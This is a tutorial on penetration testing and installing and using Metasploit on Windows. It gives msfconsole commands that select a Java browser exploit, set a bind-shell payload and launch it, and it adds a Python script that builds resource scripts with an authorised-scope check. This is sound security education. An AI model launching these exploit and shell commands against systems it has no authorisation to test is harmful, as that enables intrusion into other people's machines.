Penetration testing, also referred to as pen testing or security testing, is the practice of attacking information systems in the way an attacker would, with the objective of identifying vulnerabilities. What distinguishes pen testing from an attack is that no harm is done to the systems and the consent of the system owner is required. A vulnerability is a security weakness in some part of an information system that provides an entry point for an attack. Vulnerabilities can arise from bugs and from errors in design and configuration, among other causes. The most common attack entry points are browsers, social engineering, SQL injection, Flash, Web 2.0 applications and ActiveX. In this article we discuss penetration testing and Metasploit, and demonstrate a Windows installation of Metasploit.
Different attack scenarios call for different types of penetration test. The three types are black box, white box and grey box testing. In black box testing no information about the system is provided to the tester, who is responsible for gathering it. In white box testing complete information about the target system is provided; such testing is very useful for understanding the impact of an internal attack. In grey box testing the tester is provided with some information about the system; such a test provides an understanding of the impact of an external attack.
A penetration testing process can be broken down into four stages.
The first stage is planning the test. Its objective is to identify the scope and strategy of the test. The scope is informed by the policies and standards currently in practice.
The second stage is discovery, which consists of three activities. The first is gathering information about the system and the data it holds, referred to as fingerprinting. The second is scanning and probing the system's ports. The third is identifying any vulnerabilities the system may have.
The third stage is attack. This stage involves identifying exploits for the vulnerabilities found. An exploit is a program whose objective is to use a vulnerability to gain access to a system. A payload is the software that, once access has been gained, enables control of the compromised system; the exploit is used to deliver the payload.
The fourth stage is reporting. The objective of this stage is a detailed report of the identified vulnerabilities, their impact on the business and recommended solutions.
Although there are many tools that facilitate penetration testing, Metasploit is one of the most widely used, and this tutorial focuses on demonstrating its use. Metasploit is offered as a free community edition and a paid Pro edition that is available for a 14-day trial. Metasploit is supported on Windows, Ubuntu and Red Hat operating systems, and the latest versions of Chrome, Firefox and Internet Explorer are supported.
The Metasploit framework is organized into modules. Exploit modules are designed to take advantage of system weaknesses; examples are buffer overflows, application exploits and code injection. Auxiliary modules perform actions that do not directly take advantage of weaknesses, for example scanning and denial of service. Post-exploitation modules are aimed at gathering information on target systems. Payload modules run after a weakness has been successfully exploited; the payload provides the means to control the exploited system, for example by opening a Meterpreter session, which is delivered to the target as a DLL. NOP generator modules create random bytes to evade standard IDS signatures.
This tutorial demonstrates a Windows installation. For simplicity we use the bundled installer available here. Download the installer and follow the prompts to complete the installation. To confirm a successful installation, start a command prompt as an administrator and issue the command msfvenom.bat --help. You should get output like that shown in the image below, listing the available options.
To list all available payloads use the command msfvenom.bat --list payloads. The available payloads will be listed as shown in the image below.
To start the Metasploit console use the command msfconsole.bat. You then have access to the msf console, which is the command-line interface for using Metasploit.
To learn how to list and search for exploits, use the command help search. You can search for a specific exploit by CVE number, name or platform; for example, to list modules associated with CVEs from 2018 use the command search cve:2018.
To gather more information about an exploit, pass its module path to the info command, for example info exploit/multi/browser/java_jre17_exec.
After identifying an interesting exploit we select it with the use command, for example use exploit/multi/browser/java_jre17_exec. Once the exploit is selected we can set its options with the set command; for example, to set the local address and port on which the exploit's server listens we use the commands below
set SRVHOST 0.0.0.0
set SRVPORT 8080
To check which options can be set, use the command show options.
When an exploit has multiple targets we can select a specific target by passing its ID to the set target command. Available targets are listed with the command show targets.
To list the payloads available for the selected exploit, issue the command show payloads.
To specify a payload and its options we use the commands shown below
set payload generic/shell_bind_tcp
set LPORT 8080
To run the exploit, issue the command exploit.
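As an added example that is not part of the original tutorial, the following Python script turns the command sequence above (use, set, set target, set payload, show options, exploit) into an msfconsole resource script and ties it back to the planning stage: any RHOSTS value outside an authorised-scope list is refused before anything is run, and ports are range-checked. The module, option and payload names are the tutorial's; the scope networks are constructed for the example.

```python
import ipaddress

# Constructed example scope: the networks the system owner has authorised for this test.
AUTHORISED_SCOPE = [ipaddress.ip_network("10.10.0.0/16"),
                    ipaddress.ip_network("192.0.2.0/24")]
TARGET_KEYS = {"RHOST", "RHOSTS"}   # options that name the system under test


def in_scope(host, scope=AUTHORISED_SCOPE):
    """True only if host is an IP address inside an authorised network (fail closed)."""
    try:
        return any(ipaddress.ip_address(host) in net for net in scope)
    except ValueError:
        return False            # hostnames are not resolved here, so they are rejected


def check_port(value):
    """Return the port as an int, rejecting anything outside 1-65535."""
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {value}")
    return port


def build_resource_script(module, options, payload, payload_options=None, target=None):
    """Return resource-script text, one msfconsole command per line, in the tutorial's order.
    Exploit options are set before the payload, payload options (e.g. LPORT) after it."""
    lines = [f"use {module}"]
    for key, value in options.items():
        if key.upper() in TARGET_KEYS:
            for host in str(value).split(","):
                if not in_scope(host.strip()):
                    raise PermissionError(f"{host.strip()} is outside the authorised scope")
        if key.upper().endswith("PORT"):
            value = check_port(value)
        lines.append(f"set {key} {value}")
    if target is not None:
        lines.append(f"set target {int(target)}")
    lines.append(f"set payload {payload}")
    for key, value in (payload_options or {}).items():
        if key.upper().endswith("PORT"):
            value = check_port(value)
        lines.append(f"set {key} {value}")
    lines += ["show options", "exploit"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # The tutorial's own sequence: browser exploit served on 0.0.0.0:8080, bind shell on 8080.
    print(build_resource_script("exploit/multi/browser/java_jre17_exec",
                                {"SRVHOST": "0.0.0.0", "SRVPORT": 8080},
                                "generic/shell_bind_tcp", {"LPORT": 8080}), end="")
```

Save the output as a .rc file and review it before running it with msfconsole -r; the exploit in the tutorial has no RHOSTS option, so the scope check applies when a module that names a target host is used.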
This tutorial introduced penetration testing as an approach for identifying weaknesses in an information system. The most common vulnerabilities were highlighted, the different types of penetration test were discussed, and the stages of a penetration test were described. A brief overview of the Metasploit framework was given, and finally the use of Metasploit was demonstrated.